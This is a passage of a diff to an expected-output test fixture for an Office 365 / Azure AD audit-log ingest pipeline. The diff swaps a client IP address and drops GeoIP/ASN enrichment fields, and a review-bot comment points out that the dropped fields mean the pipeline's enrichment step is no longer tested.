- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -10321,7 +9421,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -10457,7 +9557,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
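Review bot: The new side of `@@ -10289,25 +9407,7 @@` drops the whole `source.geo` and `source.as` objects instead of replacing their values for 67.43.156.15, so this expected document no longer asserts that the pipeline's GeoIP/ASN enrichment runs at all. The supported-subset addresses are presumably chosen because the test GeoIP database resolves them; if that holds here, the regenerated file looks like it was produced on a stack without that database and should carry `source.geo`/`source.as` entries for the new address instead. Worth re-running the pipeline test with the GeoIP database present before committing this output. The same pattern appears in `@@ -10500,25 +9600,7 @@` and `@@ -10714,25 +9796,7 @@`.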
@@ -10469,12 +9569,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036386800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125127Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -10500,25 +9600,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -10532,7 +9614,7 @@
 "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -10671,7 +9753,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -10683,12 +9765,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036391100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\
\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] 
=\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125133800Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mo
zilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; 
\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to 